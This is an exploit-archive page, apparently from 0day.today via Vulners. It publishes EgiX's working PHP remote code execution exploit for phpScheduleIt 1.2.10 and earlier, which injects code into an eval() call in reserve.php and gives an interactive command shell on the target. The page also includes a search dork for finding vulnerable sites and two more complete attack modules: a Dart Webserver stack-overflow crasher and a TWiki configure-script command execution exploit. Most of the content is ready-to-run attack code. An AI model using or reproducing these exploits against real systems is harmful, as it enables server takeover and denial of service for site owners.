Search...

phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit

2008-10-01T00:00:00

ID 1337DAY-ID-3819
Type zdt
Reporter EgiX
Modified 2008-10-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
phpScheduleIt &lt;= 1.2.10 (reserve.php) Remote Code Execution Exploit
===================================================================


&lt;?php

/*
	-------------------------------------------------------------------
	phpScheduleIt &lt;= 1.2.10 (reserve.php) Remote Code Execution Exploit
	-------------------------------------------------------------------
	
	author...: EgiX
	
	link.....: http://phpscheduleit.sourceforge.net/
	dork.....: inurl:roschedule.php
	details..: works with magic_quotes_gpc = off
	
	[-] vulnerable code in /reserve.php
	
	51.	if (isset($_POST['btnSubmit']) && strstr($_SERVER['HTTP_REFERER'], $_SERVER['PHP_SELF'])) {
	52.		$t-&gt;set_title(translate("Processing $Class"));
	53.		$t-&gt;printHTMLHeader();
	54.		$t-&gt;startMain();
	55.	
	56.		process_reservation($_POST['fn']);
	57.	}
	58.	else {
	59.		$res_info = getResInfo();
	60.		$t-&gt;set_title($res_info['title']);
	61.		$t-&gt;printHTMLHeader();
	62.	   	$t-&gt;startMain();
	63.	   	present_reservation($res_info['resid']);
	64.	}

	[...]
	
	79.	function process_reservation($fn) {
	80.		$success = false;
	81.		global $Class;
	82.		$is_pending = (isset($_POST['pending']) && $_POST['pending']);
	83.	
	84.		if (isset($_POST['start_date'])) {			// Parse the POST-ed starting and ending dates
	85.			$start_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['start_date']) . '\');');
	86.			$end_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['end_date']) . '\');');
	87.		}
	
	An attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

print "\n+---------------------------------------------------------------+";
print "\n| phpScheduleIt &lt;= 1.2.10 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";

if ($argc &lt; 3)
{
	print "\nUsage......: php $argv[0] host path\n";
	print "\nExample....: php $argv[0] localhost /";
	print "\nExample....: php $argv[0] localhost /phpscheduleit/\n";
	die();
}

$host = $argv[1];
$path = $argv[2];

$payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23";
$packet  = "POST {$path}reserve.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$path}reserve.php\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

while(1)
{
	print "\nphpscheduleit-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$html  = http_send($host, sprintf($packet, base64_encode($cmd)));
		$shell = explode("_code_", $html);
		preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
	}
	else break;
}

?&gt;



#  0day.today [2018-03-10]  #

JSON Vulners Source

Initial Source

{"published": "2008-10-01T00:00:00", "id": "1337DAY-ID-3819", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:51:46", "bulletin": {"published": "2008-10-01T00:00:00", "id": "1337DAY-ID-3819", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T01:51:46"}}, "hash": "3739868fef7d2a350783a2cda81f670688830f119a507792910d641524d56511", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:51:46", "edition": 1, "title": "phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit", "href": "http://0day.today/exploit/description/3819", "modified": "2008-10-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/3819", "references": [], "reporter": "EgiX", "sourceData": "===================================================================\r\nphpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit\r\n===================================================================\r\n\r\n\r\n<?php\r\n\r\n/*\r\n\t-------------------------------------------------------------------\r\n\tphpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit\r\n\t-------------------------------------------------------------------\r\n\t\r\n\tauthor...: EgiX\r\n\t\r\n\tlink.....: http://phpscheduleit.sourceforge.net/\r\n\tdork.....: inurl:roschedule.php\r\n\tdetails..: works with magic_quotes_gpc = off\r\n\t\r\n\t[-] vulnerable code in /reserve.php\r\n\t\r\n\t51.\tif (isset($_POST['btnSubmit']) && strstr($_SERVER['HTTP_REFERER'], $_SERVER['PHP_SELF'])) {\r\n\t52.\t\t$t->set_title(translate(\"Processing $Class\"));\r\n\t53.\t\t$t->printHTMLHeader();\r\n\t54.\t\t$t->startMain();\r\n\t55.\t\r\n\t56.\t\tprocess_reservation($_POST['fn']);\r\n\t57.\t}\r\n\t58.\telse {\r\n\t59.\t\t$res_info = getResInfo();\r\n\t60.\t\t$t->set_title($res_info['title']);\r\n\t61.\t\t$t->printHTMLHeader();\r\n\t62.\t \t$t->startMain();\r\n\t63.\t \tpresent_reservation($res_info['resid']);\r\n\t64.\t}\r\n\r\n\t[...]\r\n\t\r\n\t79.\tfunction process_reservation($fn) {\r\n\t80.\t\t$success = false;\r\n\t81.\t\tglobal $Class;\r\n\t82.\t\t$is_pending = (isset($_POST['pending']) && $_POST['pending']);\r\n\t83.\t\r\n\t84.\t\tif (isset($_POST['start_date'])) {\t\t\t// Parse the POST-ed starting and ending dates\r\n\t85.\t\t\t$start_date = eval('return mktime(0,0,0, \\'' . str_replace(INTERNAL_DATE_SEPERATOR, '\\',\\'', $_POST['start_date']) . '\\');');\r\n\t86.\t\t\t$end_date = eval('return mktime(0,0,0, \\'' . str_replace(INTERNAL_DATE_SEPERATOR, '\\',\\'', $_POST['end_date']) . '\\');');\r\n\t87.\t\t}\r\n\t\r\n\tAn attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n\t$sock = fsockopen($host, 80);\r\n\twhile (!$sock)\r\n\t{\r\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\r\n\t\t$sock = fsockopen($host, 80);\r\n\t}\r\n\tfputs($sock, $packet);\r\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\r\n\tfclose($sock);\r\n\treturn $resp;\r\n}\r\n\r\nprint \"\\n+---------------------------------------------------------------+\";\r\nprint \"\\n| phpScheduleIt <= 1.2.10 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+---------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n\tprint \"\\nUsage......: php $argv[0] host path\\n\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /phpscheduleit/\\n\";\r\n\tdie();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"btnSubmit=1&start_date=1').\\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${die};%%23\";\r\n$packet = \"POST {$path}reserve.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Referer: {$path}reserve.php\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Content-Length: \".(strlen($payload)-1).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n$packet .= $payload;\r\n\r\nwhile(1)\r\n{\r\n\tprint \"\\nphpscheduleit-shell# \";\r\n\t$cmd = trim(fgets(STDIN));\r\n\tif ($cmd != \"exit\")\r\n\t{\r\n\t\t$html = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n\t\t$shell = explode(\"_code_\", $html);\r\n\t\tpreg_match(\"/_code_/\", $html) ? print \"\\n{$shell[1]}\" : die(\"\\n[-] Exploit failed...\\n\");\r\n\t}\r\n\telse break;\r\n}\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "16ae08c99dc68460307538c10ebd01c8", "key": "reporter"}, {"hash": "e70497de61bc4573e2ef25e51394f019", "key": "sourceHref"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "df48c2a2205a31bfd86c592968473783", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "a454843da6cc5f92ec73395f36c5b890", "key": "title"}, {"hash": "3eefb2370b337234f5daaa47a6ccb5a0", "key": "href"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "443374c2f2cd95a2c7b23c59c731c8e57c82494544d43de0e52ee8a7fbb59cd3", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-11T01:07:46", "edition": 2, "title": "phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit", "href": "https://0day.today/exploit/description/3819", "modified": "2008-10-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/3819", "references": [], "reporter": "EgiX", "sourceData": "===================================================================\r\nphpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit\r\n===================================================================\r\n\r\n\r\n<?php\r\n\r\n/*\r\n\t-------------------------------------------------------------------\r\n\tphpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit\r\n\t-------------------------------------------------------------------\r\n\t\r\n\tauthor...: EgiX\r\n\t\r\n\tlink.....: http://phpscheduleit.sourceforge.net/\r\n\tdork.....: inurl:roschedule.php\r\n\tdetails..: works with magic_quotes_gpc = off\r\n\t\r\n\t[-] vulnerable code in /reserve.php\r\n\t\r\n\t51.\tif (isset($_POST['btnSubmit']) && strstr($_SERVER['HTTP_REFERER'], $_SERVER['PHP_SELF'])) {\r\n\t52.\t\t$t->set_title(translate(\"Processing $Class\"));\r\n\t53.\t\t$t->printHTMLHeader();\r\n\t54.\t\t$t->startMain();\r\n\t55.\t\r\n\t56.\t\tprocess_reservation($_POST['fn']);\r\n\t57.\t}\r\n\t58.\telse {\r\n\t59.\t\t$res_info = getResInfo();\r\n\t60.\t\t$t->set_title($res_info['title']);\r\n\t61.\t\t$t->printHTMLHeader();\r\n\t62.\t \t$t->startMain();\r\n\t63.\t \tpresent_reservation($res_info['resid']);\r\n\t64.\t}\r\n\r\n\t[...]\r\n\t\r\n\t79.\tfunction process_reservation($fn) {\r\n\t80.\t\t$success = false;\r\n\t81.\t\tglobal $Class;\r\n\t82.\t\t$is_pending = (isset($_POST['pending']) && $_POST['pending']);\r\n\t83.\t\r\n\t84.\t\tif (isset($_POST['start_date'])) {\t\t\t// Parse the POST-ed starting and ending dates\r\n\t85.\t\t\t$start_date = eval('return mktime(0,0,0, \\'' . str_replace(INTERNAL_DATE_SEPERATOR, '\\',\\'', $_POST['start_date']) . '\\');');\r\n\t86.\t\t\t$end_date = eval('return mktime(0,0,0, \\'' . str_replace(INTERNAL_DATE_SEPERATOR, '\\',\\'', $_POST['end_date']) . '\\');');\r\n\t87.\t\t}\r\n\t\r\n\tAn attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n\t$sock = fsockopen($host, 80);\r\n\twhile (!$sock)\r\n\t{\r\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\r\n\t\t$sock = fsockopen($host, 80);\r\n\t}\r\n\tfputs($sock, $packet);\r\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\r\n\tfclose($sock);\r\n\treturn $resp;\r\n}\r\n\r\nprint \"\\n+---------------------------------------------------------------+\";\r\nprint \"\\n| phpScheduleIt <= 1.2.10 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+---------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n\tprint \"\\nUsage......: php $argv[0] host path\\n\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /phpscheduleit/\\n\";\r\n\tdie();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"btnSubmit=1&start_date=1').\\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${die};%%23\";\r\n$packet = \"POST {$path}reserve.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Referer: {$path}reserve.php\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Content-Length: \".(strlen($payload)-1).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n$packet .= $payload;\r\n\r\nwhile(1)\r\n{\r\n\tprint \"\\nphpscheduleit-shell# \";\r\n\t$cmd = trim(fgets(STDIN));\r\n\tif ($cmd != \"exit\")\r\n\t{\r\n\t\t$html = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n\t\t$shell = explode(\"_code_\", $html);\r\n\t\tpreg_match(\"/_code_/\", $html) ? print \"\\n{$shell[1]}\" : die(\"\\n[-] Exploit failed...\\n\");\r\n\t}\r\n\telse break;\r\n}\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-03-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "b2a9ec821d0d5824b8601c6c71860e8a", "key": "href"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "modified"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "16ae08c99dc68460307538c10ebd01c8", "key": "reporter"}, {"hash": "a6eb681f7200171c39219406bd6d16fb", "key": "sourceData"}, {"hash": "1c0b030dec77d39f7a6862c13bcdfd9b", "key": "sourceHref"}, {"hash": "a454843da6cc5f92ec73395f36c5b890", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"result": {"zdt": [{"lastseen": "2018-01-26T23:05:58", "references": [], "edition": 2, "description": "Exploit for windows platform in category dos / poc", "reporter": "catatonicprime", "published": "2012-10-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Dart Communications Stack Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-10-03T00:00:00", "id": "1337DAY-ID-19501", "href": "https://0day.today/exploit/description/19501", "sourceData": "Overview\r\n===============\r\nDartWebserver.Dll is an HTTP server provided by Dart Comunications\r\n(dart.com). It is distributed intheir PowerTCP/Webserver For ActiveX\r\nproduct and likely other similar products.\r\n\r\n\"Build web applications in any familiar software development\r\nenvironment. Use WebServer for ActiveX to add web-based access to\r\ntraditional compiled applications.\"\r\n\r\nVersion 1.9 and prior is vulnerable to a stack overflow exception,\r\nthese maybe generated by producing large requests to the application,\r\ne.g. \"a\" * 5200000 + \"\\n\\n\"\r\n\r\nAnalysis\r\n===============\r\nDuring the processing of incoming HTTP requests the server collects\r\ndata until it encounters a \"\\n\\n\" sentinel. If the request is large,\r\nmultiple copies are made and stored on the stack, this consumes the\r\namount of stack space available to the process quickly, leading to a\r\nstack overflow exception being thrown. This exception is not handled\r\nand will typically lead to the termination of the parent process. Some\r\nvariations may exist per system depending on pre-existing memory\r\nconditions and modification of Proof Of Concept (PoC) code may be\r\nnecessary to reproduce the exception.\r\n\r\nTimeline\r\n===============\r\n10/20/2011 - Discovered the bug in an affected vendor application\r\n10/20/2011 - Contacted affected vendor\r\n10/21/2011 - Affected vendor replies stating they can not get the\r\nproduct vendor to create a fix\r\n06/29/2012 - CVE assignment\r\n08/08/2012 - Contacted product vendor providing specifics\r\n08/20/2012 - Product vendor created an issue number (#5654) for the\r\nbug, but reply \"there are not immediate plans to resolve the issue\"\r\n09/28/2012 - Posting to bugtraq, for the first time ever ;-)\r\n\r\nPoC (MSF Module)\r\n===============\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::Tcp\r\ninclude Msf::Auxiliary::Dos\r\n\r\ndef initialize(info = {})\r\n super(update_info(info,\r\n 'Description' => %q{ 'Name' => 'Dart Webserver\r\n<= 1.9.0 Stack Overflow',\r\n Dart Webserver from Dart Communications throws a stack\r\noverflow exception\r\n when processing large requests.\r\n }\r\n ,\r\n 'Author' => [\r\n 'catatonicprime'\r\n ],\r\n 'Version' => '$Revision: 15513 $',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n [ 'CVE', '2012-3819' ],\r\n ],\r\n 'DisclosureDate' => '9/28/2012'))\r\n\r\n register_options([\r\n Opt::RPORT(80),\r\n OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',\r\n'520000' ])\r\n ])\r\n end\r\n def run\r\n serverIP = datastore['RHOST']\r\n if (datastore['RPORT'].to_i != 80)\r\n serverIP += \":\" + datastore['RPORT'].to_s\r\n end\r\n size = datastore['SIZE']\r\n\r\n print_status(\"Crashing the server ...\")\r\n request = \"A\" * size + \"\\r\\n\\r\\n\"\r\n connect\r\n sock.put(request)\r\n disconnect\r\n\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19501"}, {"lastseen": "2018-03-14T00:28:16", "references": [], "description": "Exploit for cgi platform in category web applications", "edition": 2, "reporter": "David Maciejak", "published": "2006-08-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-08-02T00:00:00", "id": "1337DAY-ID-634", "href": "https://0day.today/exploit/description/634", "sourceData": "======================================================================\r\nTWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta)\r\n======================================================================\r\n\r\n\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::twiki_config_typeof;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\nuse bytes;\r\n\r\nmy $advanced = { \r\n\t'HttpBoundary' => ['Mtb06z', 'HTTP boundary']\r\n};\r\n\r\nmy $info = {\r\n\t'Name' => 'Twiki Configure script TYPEOF Parameter Remote Command Execution',\r\n\t'Version' => '$Revision: 1.0 $',\r\n\t'Authors' => [ 'David Maciejak <david dot maciejak at gmail dot com>' ],\r\n\t'Arch' => [ ],\r\n\t'OS' => [ ],\r\n\t'Priv' => 1,\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 80],\r\n\t\t'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\r\n\t\t'DIR' => [1, 'DATA', 'Directory of Twiki', '/twiki'],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\tTwiki configure script. All versions of Twiki prior to \r\n\t4.0.4 hotfix 2 are vulnerable. Patch HotFix04x00x04x02 is available on twiki.org homepage.\r\n}),\r\n\t'Refs' =>\r\n\t [\r\n\t\t['BID', '19188'],\r\n\t\t['CVE', '2006-3819'],\r\n\t\t['OSVDB', '27556'],\r\n\t ],\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 128,\r\n\t\t'Keys' => ['cmd','cmd_bash'],\r\n\t },\r\n\r\n\t'Keys' => ['twiki'],\r\n\r\n\t'DisclosureDate' => 'Jul 27 2006',\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->VHost;\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $dir = $self->GetVar('DIR');\r\n\tmy $encodedPayload = $self->GetVar('EncodedPayload');\r\n\tmy $cmd = $encodedPayload->RawPayload;\r\n\tmy $boundary\t\t = $self->GetLocal('HttpBoundary');\t\t\r\n\r\n\t$cmd=\r\n\t\t\"\\r\\n--\".$boundary.\"\\r\\n\".\r\n\t\t\"Content-Disposition: form-data; name=\\\"action\\\"\\r\\n\\r\\n\".\r\n\t\t\"update\\r\\n\".\r\n\t\t\"--\".$boundary.\r\n\t\t\"Content-Disposition: form-data; name=\\\"TYPEOF:{system('$cmd')}\\\"\\r\\n\\r\\n\".\r\n\t\t\"BOOLEAN\\r\\n\".\r\n\t\t\"--\".$boundary;\r\n\r\n\tmy $proto=\"http\";\r\n\tif ($self->GetVar('SSL'))\r\n\t{\r\n\t\t$proto.=\"s\";\r\n\t}\r\n\r\n\t my $request =\r\n \t\"POST \".$dir.\"/bin/configure HTTP/1.1\\r\\n\".\r\n\t\t\"Content-Type: multipart/form-data; boundary=\".$boundary.\"\\r\\n\".\r\n\t\t\"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\\r\\n\".\r\n\t\t\"Host: $target_host\\r\\n\".\r\n\t\t\"Referer: \".$proto.\"://\".$target_host.$dir.\"/bin/configure\\r\\n\".\r\n\t\t\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/png\\r\\n\".\r\n\t\t\"Accept-Language: en\\r\\n\".\r\n\t\t\"Content-Length: \". length($cmd). \"\\r\\n\\r\\n\".\r\n\t\t$cmd;\r\n\r\n\tmy $s = Msf::Socket::Tcp->new(\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\r\n\tif ($s->IsError){\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$s->Send($request);\r\n\r\n\tmy $results = $s->Recv(-1, 200);\r\n\r\n\tif ($results=~ /^transfer-encoding:[ \\t]*chunked\\b/im){\r\n\t\tmy @extract_result;\r\n\t\tmy @results = split ( /\\r\\n/, $results );\r\n\r\n\t\tchomp @results;\r\n\t\tmy $fill_extract_result=0;\r\n\t\tmy $end_break=0;\r\n\t\tmy $i=0;\r\n\t\twhile ( !$end_break && ($i < @results)){\r\n\t\t\tif ($results[$i] =~ /\\<div id=\\\"patternScreen\\\"\\>/)\r\n\t\t\t{\r\n\t\t\t\t$fill_extract_result=0;\r\n\t\t\t\t$end_break=1;\r\n\t\t\t}\r\n\t\t\tif ($fill_extract_result>0) {\r\n\t\t\t\t\tpush(@extract_result,$results[$i]);\r\n\t\t\t}\r\n\t\t\tif ($results[$i] =~ /\\<body class=\\\"patternNoViewPage\\\"\\>/)\r\n\t\t\t{\r\n\t\t\t\t$fill_extract_result=1;\r\n\t\t\t}\r\n\t\t\t$i++;\r\n\t\t}\r\n\r\n\t\tif (@extract_result < 3) {\r\n\t\t\t\t$self->PrintLine(\"[*] Target may be not vulnerable, or you have used ';' char in CMD\");\t\r\n\t\t}\r\n\t\telse {\r\n\t\t\tfor ($i=1;$i<@extract_result;$i+=2) {\r\n\t\t\t\tchomp @extract_result;\r\n\t\t\t\t$self->PrintLine(\"$extract_result[$i]\");\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\t$s->Close();\r\n\treturn;\r\n}\r\n\r\nsub VHost {\r\n\tmy $self = shift;\r\n\tmy $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');\r\n\treturn $name;\r\n}\r\n\r\n1;\r\n\r\n\r\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/634"}]}}

phpScheduleIt &lt;= 1.2.10 (reserve.php) Remote Code Execution Exploit

Description

Exploit for unknown platform in category web applications

phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit